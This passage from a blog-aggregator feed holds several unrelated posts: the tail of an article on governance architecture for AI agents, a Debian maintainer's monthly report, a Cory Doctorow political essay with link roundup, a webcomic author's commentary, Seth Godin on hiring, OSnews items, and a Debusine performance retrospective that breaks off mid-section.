The failure mode this prevents has a name: decision amnesia. Without longevity, the agent repeats the same rejected intent because the rejection is not part of the next decision cycle.

With and without Epistemic Longevity

Pillar 5: Decision telemetry—immutable accountability

Every PolicyProposal carries a Decision Flow ID (dfid) that binds it to the full decision context. Rather than dumping unstructured logs, this constructs a reconstruction primitive—a relational trace connecting:

  • The Input: The exact Context Snapshot (T0) the agent reasoned against.
  • The Validation: The outcome evaluated against the Responsibility Contract.
  • The Outcome: The final execution receipt.

This correlated record enables answering “why did this agent do this, at this specific moment, against what state of the world?” using a standard SQL join across the full decision lifecycle. In higher-assurance deployments, the same structured telemetry can be wrapped into a cryptographically signed proof-carrying intent, allowing independent verification of the decision artifact without asking anyone to trust mutable text logs—exactly the direction high-risk compliance regimes such as the EU AI Act are pushing toward.

But structured decision telemetry does more than support daily postmortems. Every decision becomes a structured relational record bound by DFID—the same foundation that makes macroscopic failures like Agent Drift detectable before they compound silently across the fleet.

Human-Over-The-Loop—autonomy at scale

The alternative to Human-in-the-Loop is not to remove the human, but to move the human from the execution loop to the design loop.

This is the Human-Over-The-Loop (HOTL) model. The human acts as a Policy Designer who defines and evolves the contract that governs decisions, while the system operates autonomously inside those boundaries. No approval queue. No review fatigue. Governance by Exception is the scalable model.

Figure 2: Human-Over-The-Loop modelFigure 2: Human-Over-The-Loop shifts the human from the execution queue to the design loop. The agent runs autonomously within a deterministic contract; the human governs by defining that contract and intervening only on genuine exceptions.

Escalation Triggers. The system escalates only when the agent encounters a situation its contract does not authorize it to resolve alone:

  • Proposed action exceeds a contract authority limit
  • Agent confidence drops below escalate_on_uncertainty threshold
  • External API errors exceed a retry budget
  • No decision has been emitted within a configured inactivity window

When a trigger fires, the DecisionFlow enters ESCALATED state. The operator sees the WorkingContext, the PolicyProposal, and the reason for escalation, and can OVERRIDE, MODIFY, or ABORT. This is not an “Approve / Reject” queue; it is targeted intervention.

Escalation should not be understood as proof that the agent reliably knows what it does not know. LLMs are poor judges of their own uncertainty, so the architecture does not trust introspection. The escalate_on_uncertainty threshold is a useful heuristic, not a ground truth: the system forces escalation when declared confidence falls below the threshold, or when the proposal violates contract parameters the Kernel can evaluate deterministically. If the model produces a bad proposal with high confidence, the Runtime still blocks it. The agent may signal uncertainty; the Runtime decides whether that uncertainty matters.

Frozen Context + JIT. The operator reviews the proposal against the exact snapshot of the world the agent saw at T0, avoiding the TOCTOU (Time-of-Check to Time-of-Use) problem: The human audits the machine’s decision using exactly the data the machine saw.

But the world keeps moving. Hitting “OVERRIDE” at T1 does not blindly execute the action; it forces the proposal through the Runtime’s JIT (Just-In-Time) Verification gate. If reality has drifted beyond the contract’s Drift Envelope between T0  and T1 , the Runtime rejects the override rather than executing a once-valid intent against stale state.

Contract Evolution. The right long-term response to a legitimate edge case is usually not repeated override, but contract change. If business reality shifts, the operator updates the Responsibility Contract and deploys a new version. The system adapts through version-controlled governance boundaries rather than prompt edits or fine-tuning.

Escalation Budget. Escalation is rate-limited by a token bucket per agent (for example, 3 escalations per hour). If an agent exhausts that budget, the Runtime transitions it to SUSPENDED, records the state change, and blocks new DecisionFlows until an operator intervenes. This prevents Escalation DDoS and contains runaway reasoning costs.

Confidence ≠ Authority. An agent may emit a proposal with confidence=0.99, and if that proposal exceeds contract authority, the Runtime rejects it. Self-assessed certainty is not permission.

Figure 3: Scaliability shiftsFigure 3: HITL scales supervision cost with agent volume. HOTL shifts that cost to policy design—the human governs the production line, not individual decisions.

Wrapping, not replacing: The role of existing frameworks

Adopting the ROA pattern does not mean discarding the tools your engineering teams have spent the last year mastering. Frameworks like LangChain, AutoGen, and CrewAI excel at orchestrating complex reasoning loops, RAG pipelines, and tool use. ROA is not designed to compete with them; it is designed to govern them.

Figure 4: The ROA patternFigure 4: The ROA pattern wraps existing orchestration frameworks (like LangChain or CrewAI) in User Space, restricting direct execution and forcing output through a structured Policy Proposal validated by Kernel Space.

In practice, you can take a mature LangChain agent and wrap it inside an ROA boundary. The underlying framework still handles the probabilistic reasoning (User Space orchestration). The architectural shift is simple but consequential: you filter the framework’s tool space. You physically remove exchange.execute_trade() or db.drop_table() from the LangChain agent’s toolbox. Instead, you provide it with a single, sandboxed tool: emit_policy_proposal(). The agent reasons, iterates, and eventually calls that tool to emit its final intent. The ROA wrapper catches this claim, may perform a local self-check as a noise-reduction heuristic, and forwards the PolicyProposal across the boundary to the Kernel Space for actual enforcement. You keep the power of the framework, but you gain deterministic execution governance where it matters.

Costs and trade-offs

ROA is not free. It introduces engineering overhead precisely because it replaces informal trust with explicit governance.

  • Validation gates and JIT checks add latency to every side-effectful decision.
  • Responsibility Contracts add design overhead: authorship, versioning, ownership, and review now have to be explicit.
  • DFID-linked auditability adds storage, tracing, and operational integration work.
  • Escalation thresholds and budgets require domain tuning; bad defaults either flood operators or hide legitimate exceptions.

These costs are justified only when the downside of an incorrect side effect is materially higher than the cost of controlling it. For RAG chatbots and low-risk assistants, this architecture is often excessive. For high-stakes systems, it is the cost of building a real boundary.

Conclusion: Architecture, not alchemy

Five pillars. One architectural commitment: an agent that cannot be trusted to govern itself must operate inside a system that governs it instead. The Responsibility Contract bounds authority. The Mission locks the objective. Epistemic Isolation ensures output is a claim, not a command. Longevity prevents the system from forgetting what it already learned. Audit makes every decision reconstructable. The ROA pattern—a Responsibility Contract instead of a capability list, Claims instead of Commands, a deterministic kernel instead of an informal prompt—composes these into a single enforceable boundary. Intent is structured by the agent. Boundaries are enforced by the contract. Telemetry is accumulated by DFID. The Human-Over-The-Loop model reserves human judgment for genuine exceptions, not approval queues. Together, they transform a probabilistic model into a governable production actor.

Once deterministic execution boundaries and DFID-linked telemetry are in place, a different class of day-three questions becomes possible: Which agents stay within limits yet quietly destroy margin? Which decision patterns justify automatic suspension before humans notice the drift? How do we reconstruct any action to regulatory standard, govern a fleet where agents carry different risk profiles and decision weights?

Responsibility is the missing execution-governance layer—and it belongs in the architecture, not the system prompt.

The era of AI demos is ending. The era of AI production systems is beginning. Those systems will not be distinguished only by the intelligence of their models. They will also be distinguished by the rigor of their governance.


This article provides a high-level introduction to the Responsibility-Oriented Agents and  Decision Intelligence Runtime and its approach to production resiliency and operational challenges. The full DIR specification, ROA contract schemas, reference implementations are available as an open source project at GitHub.

13:49

Representative Line: A Solid Reference [The Daily WTF]

Today's anonymous submitter works for a large company. It's one of those sorts of companies which has piles, and piles, and piles of paperwork and bureaucracy. It also means that much of their portfolio of software is basic CRUD applications. "Here's a database for managing invoices." "Here's a database for managing desk assignments." "Here's a pile of databases which link our legacy applications to our new ERP system."

Which brings us to our representative line. It is not a representative line of code, but a representative line of the design specification. This is the design specification for yet another database-driven application.

7.7 REFERENTIAL INTEGRITY CONSTRAINTS
Referential integrity constraints are not applicable for [REDACTED] Application.

Upon seeing this, our submitter predicted that they'd be having a lot of TDWTF submissions in their future.

The worst part? This isn't the only time this has been included in the design spec. Several database driven applications have had this line in their spec. No one is able to explain exactly why referential integrity constraints are not applicable. At best, there are a few batch jobs that don't define a schema themselves, though they need to comply with it. Maybe someone is just copying and pasting from an old design spec and hoping no one notices or cares?

Good news: it's likely that no one will notice, or care. At least not until something breaks in production.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

13:35

Colin Watson: Free software activity in April 2026 [Planet Debian]

My Debian contributions this month were all sponsored by Freexian.

You can also support my work directly via Liberapay or GitHub Sponsors.

dput-ng

Ian Jackson reported that dput-ng could lose data when using the local install method (relevant in tests of other packages, for instance) and filed an initial merge request to fix it. I improved this to isolate its tests properly, and uploaded it.

groff

I upgraded from 1.23.0 to 1.24.1. 1.24.0 and 1.24.1 were the first upstream releases since 2023, and had extensive changes; I’d had the corresponding packaging changes in the works since January, but it took me a while to get round to finishing them off. It was good to get this off my list.

OpenSSH

I released bookworm and trixie fixes for CVE-2026-3497, and issued the corresponding BSA-130 for trixie-backports.

I upgraded from 10.2p1 to 10.3p1.

parted

I upgraded from 3.6 to 3.7. 3.7 was the first upstream release since 2023, but the changes were nowhere near as extensive as groff, so this was a fairly quick job. I also fixed the parted-doc package to ship proper API documentation.

Python packaging

New upstream versions:

I started an upstream discussion about how best to handle the pydantic and pydantic-core packages now that they share an upstream git repository.

Other bug fixes:

Rust packaging

New upstream versions:

YubiHSM packaging

I upgraded from 2.7.2 to 2.7.3.

Code reviews

12:14

LLMs and Text-in-Text Steganography [Schneier on Security]

Turns out that LLMs are really good at hiding text messages in other text messages.

11:28

Pluralistic: 2024 (apart from the obvious) (11 May 2026) [Pluralistic: Daily links from Cory Doctorow]

->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> Top Sources: None -->

Today's links

  • 2024 (apart from the obvious): Some unforced errors.
  • Hey look at this: Delights to delectate.
  • Object permanence: Denmark legalizing music trading; Babysuit; Patent Office invites "peer review"; DRM protest at the Bastille; Scientology's "super powers"; Banana Dalek; Florida v pediatricians' gun safety advice; Copyright filters and wage theft; "Who Broke the Internet?" Vatican astronomer v Creationism; Teens, privacy and Facebook; Čapek's graveside robot; Save iTunes; NZ laundered money for Latinamerica's looters; Memex Method.
  • Upcoming appearances: Barcelona, Berlin, Hay-on-Wye, London, NYC, Edinburgh.
  • Recent appearances: Where I've been.
  • Latest books: You keep readin' em, I'll keep writin' 'em.
  • Upcoming books: Like I said, I'll keep writin' 'em.
  • Colophon: All the rest.



A meat grinder; disappearing into the top is a sad donkey dressed in Democratic Party livery; emerging from the bottom is a Trump-wigged elephant in GOP livery. The grinder bears an 'I Voted' sticker, with a ? added to the end of it. The background is a Dore engraving of a cloudy sky, tinted blue.

2024 (apart from the obvious) (permalink)

Just as Hillary Clinton positioned her run as a third term for Obama ("America is already great"), so did Biden (and then Harris) position their campaigns as a second Biden term. As Biden said (in 2019): "Nothing would fundamentally change":

https://www.salon.com/2019/06/19/joe-biden-to-rich-donors-nothing-would-fundamentally-change-if-hes-elected/

So a vote for Biden would be a vote for another four years of forceful, material support for genocide; another four years of compromise with the Democratic establishment on student debt and healthcare gouging; and another four years of a president who was obviously in mental decline.

Harris's campaign was, "A vote for me is a vote for all of the above (minus the cognitive decline)." Actually, it was worse: by conspicuously failing to campaign on the Biden administration's record on reining in corporate power, a vote for Harris was "A vote for all of the above, minus the mental decline and the antitrust."

Whereas a vote for Trump was a vote for change, a vote to give the establishment a black eye. It was also a vote for genocide and racist pogroms and gangster kleptocracy, which is why many voters stayed home, casting a ballot for America's all-time favorite candidate, "None of the above," while any number of furious people and/or vicious racists turned out for Trump.

There's one book that crystallizes my thoughts on this better than any other: Naomi Klein's 2023 Doppelganger, which analyzes our politics in terms of (warped) "mirror images." One of the mirror world pairings that Klein analyzes is the progressive movement, a coalition of liberals and leftists (led by liberals).

Like every coalition, the two main groups that constitute "the progressives" do not agree on many important issues, though they do have common goals. Both groups support equality for people of all genders and races, but for liberals, an equal world is one that fixes the problem that 150 straight white men own everything by replacing 75 of them with racialized people, women and queer people (whereas the leftist fix is abolishing the system in which 150 people own everything).

Biden set himself up as a peacemaker for this coalition, and his "unity task force" divided up the appointments in his administration between the Warren-Sanders leftists and liberals, including those who clearly belonged to the Manchin-Sinematic universe. This meant that his administration worked at cross-purposes to itself, neutering its boldest initiatives, rendering them impotent.

Take Biden's plan to finally allow Medicare to negotiate drug prices with pharma companies, a move that was very long overdue. Before this, the way the system worked was: pharma companies named a price – any price! – and then Uncle Sucker paid it. No other country in the world operates this way, and, of course, the lion's share of pharma R&D costs are already borne by the American public (or they were, until Musk DOGEd the US research budget to death).

So the American public pays more than anyone else in the world to develop these drugs, and then they pay more than anyone else in the world to buy these drugs. This is madness, and putting an end to it is an obvious political win. But Biden found a way to do it that "balanced" the leftist principle of protecting people from capitalist exploitation with the liberal principle of protecting businesses lest the essential function of developing life-saving drugs become a state activity (rather than a market one).

Biden's solution? A "Build Back Better" plan that would allow the federal government to negotiate up to ten drug prices (and as few as zero drug prices), but the new prices would only kick in after the 2024 election, so no one would see the benefit of this in time for the next general election:

https://pluralistic.net/2021/11/18/bipartisan-consensus/#corruption

This is a solution that pleases no one – and that's the point. Biden and his team viewed the presidency as an institution for making sure everyone was equally unhappy, a philosophy that Anat Shenker-Osorio calls "pizzaburger politics." This is named for a thought-experiment in which half your family wants pizza and the other half wants burgers, so you serve them "pizzaburgers" and make everyone miserable and declare yourself to have the fair-handed wisdom of Solomon (yes, I'm aware that this analogy has a fatal flaw in that pizzaburgers actually sound delicious, but work with me here).

Biden prided himself on running a pizzaburger presidency, in which every move that satisfied the left of his party was neutralized by a concession to the party's right wing establishment:

https://pluralistic.net/2024/05/29/sub-bushel-comms-strategy/#nothing-would-fundamentally-change

(Trump enacted a mirror-world version of Biden's pharma price controls: TrumpRx, a program that claims to lower drug prices while those prices actually go up):

https://democrats-energycommerce.house.gov/sites/evo-subsites/democrats-energycommerce.house.gov/files/evo-media-document/e-c-democrats-trumprx-big-talk-little-savings.pdf

Biden's pizzaburger compromises made everyone unhappy. He appointed generational talents like Lina Khan, Jonathan Kanter and Rohit Chopra to run key agencies charged with crushing corporate power, and then gave lifetime appointments to corporate-friendly judges who blocked their rulemakings and penalties:

https://www.aljazeera.com/news/2023/7/11/us-judge-turns-down-challenge-to-microsoft-merger-with-activision

Of course, it wasn't just Biden's own judicial appointees who stood in his way; from the Supreme Court on down, on issues from student debt cancellation to noncompetes, judges blocked the Biden administration. When this happened, Biden somehow couldn't find his way to his bully pulpit. Rather than working the refs – the way Trump does, in ways that energize his base, stiffens his legislators' resolve and intimidates other judges – Biden tinkered in the margins to find ways to advance half-measures and stayed mum in public.

This compromise-oriented meekness carried over into Biden's relationship with Democratic lawmakers who sold out the American people. Rather than campaigning for the primary opponents of monsters like Fetterman, Sinema and Manchin, Biden worked behind the scenes to broker compromises, delivering yet another inedible pizzaburger (and acting hurt and bewildered when no one thanked him for it). The alternative? Constitutional hardball:

https://pluralistic.net/2024/10/18/states-rights/#cold-civil-war

It's not clear whether Harris's abbreviated campaign could have made the public case that she would govern in a more muscular fashion as befitted the polycrisis facing the nation, but she didn't even try. A couple Democratic Party insiders of my acquaintance tell me that Biden only agreed to step aside on the condition that Harris not criticize his record. I don't know if that's true, but even within that hypothetical constraint, Harris hardly presented herself as an avatar of change. She carried on Biden's tradition of conspicuously failing to campaign on the significant achievements of Biden's own trustbusters, and put her brother-in-law, the lawyer who helped Uber crush labor rights in California, in charge of her campaign:

https://www.nytimes.com/2024/08/04/us/politics/kamala-harris-tony-west.html

The point of all this is that the American people have, on two occasions, comprehensively rejected the "America is already great"/"Nothing would fundamentally change" politics of a liberal-dominated left/liberal progressive coalition. The senior partners in that coalition have driven the country into a ditch, letting Trump stage a fascist takeover that has us fighting not to win another election, but just to have another one.

Americans are sick of being told that their politicians can't do anything because "they're not the Green Lantern:"

https://pluralistic.net/2023/01/10/the-courage-to-govern/#whos-in-charge

America isn't already great. If we are to have more elections – much less win them – we will need to mobilize millions of people. You don't do that by telling them to oppose Trumpismo – you get them out in the streets by giving them something to support. That was Mamdani's winning message: "I know what a politician can do, and I will do it":

https://pluralistic.net/2026/02/24/mamdani-thought/#public-excellence


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago Denmark plans to legalize music trading https://edition.cnn.com/2001/TECH/internet/05/07/denmark.downloads.idg/index.html

#20yrsago Babysuit https://web.archive.org/web/20060513013815/https://www.gildlilies.com/pop_ups/phillip_toledano_kaleidoscope.htm

#20yrsago Patent office will ask the public to “peer review” inventions https://web.archive.org/web/20060512051743/http://www.dotank.nyls.edu/communitypatent/

#20yrsago Report from France’s DRM protest at Place de la Bastille https://web.archive.org/web/20170902135411/https://tofz.org/?dir=Paris%2Fevents%2FMarch

#20yrsago Interactive maps show your city’s floodline when the sea rises https://flood.firetree.net/

#20yrsago Scientology to open “Super Power” training center in FL https://web.archive.org/web/20060522112457/http://www.sptimes.com/2006/05/06/Tampabay/Scientology_nearly_re.shtml/
#20yrsago Homemade radios http://www.duntemann.com/radiogallery.htm

#20yrsago Vatican astronomer denounces Creationism as “paganism” https://web.archive.org/web/20060517013332/http://news.scotsman.com/international.cfm?id=674042006

#20yrsago Canada’s New Democratic Party embraces copyfighting musicians https://web.archive.org/web/20060520024734/http://www.ndp.ca/page/3713

#15yrsago Teens and privacy online: using Facebook is compatible with valuing privacy https://www.zephoria.org/thoughts/archives/2011/05/09/how-teens-understand-privacy.html

#15yrsago Ann Arbor library acquires lending, sharing and copying rights to Creative Commons music catalog https://annarborchronicle.com/2011/04/28/ann-arbor-library-signs-digital-music-deal/

#15yrsago Tin robot on Karel Čapek’s grave https://www.gilesorr.com/travels/Prague2011/BestPrague.20110421.6142.GO.CanonSX10.html

#15yrsago Just look at this banana Dalek. https://web.archive.org/web/20110716022131/https://www.daleksoftheday.com/2011/05/banana-dalek.html

#15yrsago NRA and Florida gag pediatricians: no more firearm safety advice for parents https://www.npr.org/2011/05/07/136063523/florida-bill-could-muzzle-doctors-on-gun-safety

#10yrsago Conservative economics: what’s happened to the UK economy after a year of Tory rule https://web.archive.org/web/20160509113126/https://www.independent.co.uk/news/business/news/what-has-happened-to-the-economy-under-the-tories-in-six-charts-a7017131.html

#10yrsago Save iTunes: how the W3C’s argument for web-wide DRM would have killed iTunes https://www.eff.org/deeplinks/2016/04/save-itunes

#10yrsago America’s courts are going dark https://www.justsecurity.org/30920/courts-going-dark/

#10yrsaogo Australian government issues report calling for copyright and patent liberalisation https://www.eff.org/deeplinks/2016/05/australian-productivity-commission-slams-protectionist-copyright-and-patent-laws

#10yrsago Panama Papers: New Zealand is the go-to money launderer for crooked Latin Americans https://www.rnz.co.nz/news/panama-papers/303356/nz-at-heart-of-panama-money-go-round

#10yrsago Safe Patient Project: searchable spreadsheet tells Californians whether their doc is on probation, and why https://web.archive.org/web/20160507002350/http://consumersunion.org/research/california-doctors-on-probation/

#5yrsago The Memex Method https://pluralistic.net/2021/05/09/the-memex-method/

#5yrsago How copyright filters lead to wage-theft https://pluralistic.net/2021/05/08/copyfraud/#beethoven-just-wrote-music

#1yrago Who broke the internet? https://pluralistic.net/2025/05/08/who-broke-the-internet/#bruce-lehman


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers..

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification, Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

11:07

Grrl Power #1459 – Chemical Frenemies? [Grrl Power]

She likes him because he challenges her. And by “likes,” I mean she hasn’t killed him yet for challenging her. Or for being an arrogant ass.

No, the story about the MIT/CERN kid isn’t Deus’s backstory, but it apparently is a not-uncommon arc for child prodigies who grow up surrounded by a bunch of average brain types, then finally settle into some bleeding edge profession, and learn that they’re in the 50th percentile of the intelligencia 1%.

I think exponential intelligence is genuinely incomprehensible, because individuals or groups at one intelligence level really lack the tools to understand a group that’s, for instance, ten times as smart. Of course, “ten times” is impossible for us to really quantify anyway, because “ten times” what? The word “intelligence” is really poorly defined in absolute terms. I mean, if you’re good at math but can’t remember dates and anniversaries, are you smarter than someone who struggles to add 15 and 7, but has an eidetic memory? Or is the world’s best astrophysicist smarter than the world’s best diplomat? One can figure out what dark energy is, the other can save hundreds of millions of lives by preventing wars. How much does emotional intelligence factor in? Without it, we’d have a world of sociopaths. At a certain point, information throughput becomes a limiting factor. Is a once-in-a-generation genius who secludes himself and occasionally publishes some revolutionary mathematical proof “smarter” than The Machine from Person of Interest (which was a show where a massive supercomputer processed every video and phone call and text message, etc, and alerted the Feds to terrorist plots – which sounds terribly dystopian, but the inventor (the glasses guy from Lost) made it a closed system so the government couldn’t use it to spy. The bulk of the episodes revolved around the fact that it could also detect people plotting non-national level crimes like murder, so the inventor put a backdoor in that would spit out a Person of Interest, and they wouldn’t know if it was the perpetrator or the victim. Anyway, I thought it was an entertaining show.) You’d probably say that The Machine in this case wasn’t intelligent at all, but throughout the series, it demonstrated an ability to learn and had a non-human intelligence that allowed it to stay ahead of the evil government agencies and corporations that wanted to abuse its abilities.

The point is, actual capitol-S Super intelligence is one of those things that are on Archon’s short list of Apocalypse level threats, because it’s very likely that the individual with that ability could out plot, plan, and prepare the entirety of the rest of the human race. If Deus built a suit of armor or a rocket powered paraglider and wore a goblin mask so he could rob banks, no one would give a crap about him on the macro level. Instead, he has the resources of a medium-sized-and-growing country and access to alien technology and probably demonic magic. So he’s being watched by a lot of agencies and interests. Some think he might become an exploitable resource, but they’re dumb. I mean, literally, compared to him, they’re very very dumb. Of course, that’s not to say he’s the only super intelligence on Earth. But most of the known ones are more like Digit. Focused on tangible sciences and engineering, not his broader approach to economics, diplomacy and politics.

Obviously Deus has some broad-spectrum approach to resisting chemical influence in place. After all, he’s the leader of an up-and-coming, expanding nation, and seems to be, on the surface, doing a good job for the people under his administration. And he’s making enemies of every surrounding country and eventually he’s going to start hitting countries that third parties have financial interests in. Third parties like diamond oligopolies, mining consortia, all kinds of larger criminal organizations, and eventually, whole countries. Not to mention the Alari colony ship. They’ve agreed to live under his rule, but what that really means is they do whatever they want within their little fiefdom, which amounts to the area they’ve expanded their ship into, plus some extra land they negotiated with Deus, but outside of that, they’re subject to the laws of Galytn. They would immediately assume authority if something “happened” to him. That’s assuming they could keep Thothogoth from using Galytn as a foothold for his own conquest, or that either of them could stand up to the Supers in Deus’s military.

So Deus has some preventative measures and contingencies in place, they’re just not super overt like most comic book Super Smarts do. You know, an army of Deus-bots, or a metal throne room with Kirby-esque pipes and energy fields full of dots that project force fields that can only be deactivated after he delivers a monologue.


Sexy bodymod news lady Gail has a special one-on-one interview with Tournament Quarter finalist Saraviah Nightwing! And if you subscribe to Gail’s Space Patreon, (which, due to the vagaries of Earth and Gal-Net’s DNS servers, happens to be the same as the Grrl Power Patreon, go figure) you can see that same interview in the nude! Well, eventually. The nude part of the interview, as well as the version that includes shading will be coming soon. Of course, you can view the interview in the nude now if you take your own clothes off. You know. Technically. Just put a towel on your chair first.

 


Double res version will be posted over at Patreon. Feel free to contribute as much as you like.

10:35

The shared tragedy of Red Queen hiring [Seth's Blog]

Runaway selection happens when organizations compete with each other far beyond the point where it’s rational to do so. We see this in species as well–peacocks have ungainly and inefficient feather displays because, as Alice’s Red Queen said, “It takes all the running you can do to keep in the same place.”

In organizations, there’s a desire to do good work. Pressure to outdo the others. And a desire for deniability and certainty. Add those up, and we are left with a quest for more long after it’s helpful.

How many people applied for that good job you just posted? 1,000? Spread the word, more applications must be a good thing. It’s not unusual for digitally-amplified hiring processes to see 5,000 applications arrive in a day. 360,000 people applied for a slot in the Goldman Sachs internship program. Would a million have been better?

And then, let’s use AI to pick the 80 best candidates and interview each via Zoom.

Take the ten best and put them through a series of interviews, rotating through each person on the team, including aptitude tests and real-time projects. In many organizations, there are 6, 7 or even 10 rounds of interviews.

It costs a typical organization more than $14,000 to hire an executive, and the time and emotional cost to applicants is many times that. This all leads to lowered productivity, wasted time and a damaged brand.

What do we get in exchange for this investment? Are the people you hire with this exhausting/exhaustive process adding more value than the ones we found with much less time ten years ago?

And the second question: would your third or fourth choice have worked out just as well, if not better?

If Red Queen hiring actually worked, then we’d see that organizations that spend more time on it would outperform those that don’t. It’s pretty clear to me that this isn’t the case–it’s not an investment in the future, it’s a sign of bureaucratic stasis, a quest for deniability, and a thoughtless pursuit of the wrong sort of more. We’ve made it much easier for people to apply for jobs, but done little to improve what happens after the applications arrive.

What if we spent the time wasted on Red Queen maximization doing something useful instead–training and orientation, perhaps. Interview until you find someone who can do the job, then hire them. Then get back to work.

We can’t even ask that question, because it feels like a compromise. Without any data at all, we’ve bought into the Red Queen race that our false proxies, sufficiently polished, deliver better results. In fact, there’s a huge increase in the cost to the applicants and the organization, but no measurable increase in the value created.

Successful fishermen understand that casting an ever-wider net is not always the best way to catch the fish you need.

10:28

Debian embraces reproducible builds [OSnews]

Big news from the Debian release team: Debian is going for reproducible package builds.

Aided by the efforts of the Reproducible Builds project, we’ve decided it’s time to say that Debian must ship reproducible packages. Since yesterday, we have enabled our migration software to block migration of new packages that can’t be reproduced or existing packages (in testing) that regress in reproducibility.

↫ Paul Gevers

Reproducible means, in short, that you can verify that the source code used to build a package is indeed that source code. This provides a layer of defense against people tampering with code or otherwise trying to fiddle with the process between source code and final package on your system. This effort constitutes a tremendous amount of work, but it’s massively important.

“Building a web server in aarch64 assembly to give my life (a lack of) meaning” [OSnews]

ymawky is a small, static http web server written entirely in aarch64 assembly for macos. it uses raw darwin syscalls with no libc wrappers, serves static files, supports GET, HEAD, PUT, OPTIONS, DELETE, byte ranges, directory listing, custom error pages, and tries to be as hardened as possible.

why? why not? the dream of the 80s is alive in ymawky. everybody has nginx. having apache makes you a square. so why not strip every single convenience layer that computer science has given us since 1957? i wanted to understand how a web server actually works, something i know little about coming from a low-level/systems background. the risks that come up, the problems that need to be solved, the things you don’t think about when you’re writing python or c.

this (probably) won’t replace nginx, but it is doing something in the most difficult way possible.

↫ Tony “imtomt”

I love this.

Object oriented programming in Ada [OSnews]

Ada is incredibly well designed. One way this shows is that it takes the big, monolithic features of other languages and breaks them down into their constituent parts, so we can choose which portions of those features we want. The example I often reach for to explain this is object-oriented programming.

↫ Christoffer Stjernlöf

Exactly what it says on the tin.

09:42

Freexian Collaborators: Debusine workflow performance issues (by Colin Watson) [Planet Debian]

During March and April, we had a number of performance issues that made Debusine’s core functions of running work requests and reflecting their results in workflows quite unreliable. Investigating and fixing this took up a lot of time from both the Debusine development team and Freexian’s sysadmins.

The central problems involved a series of database concurrency and worker communication issues that interacted in complex ways. On bad days, this caused between 10% and 25% of processed work requests to fail unnecessarily. We communicated some of the problems to users on IRC, but not consistently since we didn’t entirely understand the scope of the problems at the time.

Most of the problems are fixed now, but we had a retrospective meeting to make sure we understood what happened and that we learn from it. Here’s a summary.

Data model

Debusine’s workflows consist of many individual work requests. Each work request has a database row representing its state, which means that the overall state of a workflow is distributed across many rows. Changes to one work request (for example, when it is completed) can cause changes to other work requests (perhaps unblocking it so that it can be scheduled to an idle worker). Those changes may happen concurrently, and in practice often do.

Workers typically need to create artifacts containing the output of tasks: these include things like packages, build logs, and test output.

Debusine records task history so that it can make better decisions about how to schedule work requests. Since this might otherwise grow without bound, the server expires older parts of that history after a while. The same is true for many other kinds of data.

Causes

  • Because workflows involve changes that propagate between work requests, there were historically some cases where different parts of the system could deadlock due to trying to take update locks on overlapping sets of work request rows in different orders. We mitigated that somewhere around 2025-11-05 by locking entire workflows in one go before making any change that might need to propagate between work requests like this; that dealt with the deadlocks, but it’s quite a heavyweight locking strategy that sometimes caused significant delays.

  • We’ve been working for some time to make Debusine useful to Debian developers, and regression tracking is an important part of that: it lets developers test uploads without being too badly misled by tests in related packages that were already failing before they started. On 2026-03-11 we enabled this by default on debusine.debian.net, after testing it for a while. Although this is useful, it put more load on the system as a whole, often approximately doubling the number of work requests in a given workflow with many additional dependencies between them.

  • Like much of the world, we’re in an arms race with unethical scrapers desperately trying to feed everyone else’s data into LLMs before they run out of money. We saw a substantial uptick here towards the end of March, which meant that we had to temporarily disable regression tracking and to put some other mitigations in front of our web interface.

  • We historically haven’t had systematic internal timeouts. Prompted by ruff, a Google Summer of Code applicant went through and added timeouts in many places, including some calls between the worker and the server. This was fiddly work and the student did a solid job, so I’m not putting them on blast or anything! However, it did mean that some things that came in under load balancer timeouts now timed out earlier on the client side of the request (and hence in Debusine workers), which made some problems show up in different ways and be more obvious. This was deployed on 2026-04-03.

Fixes

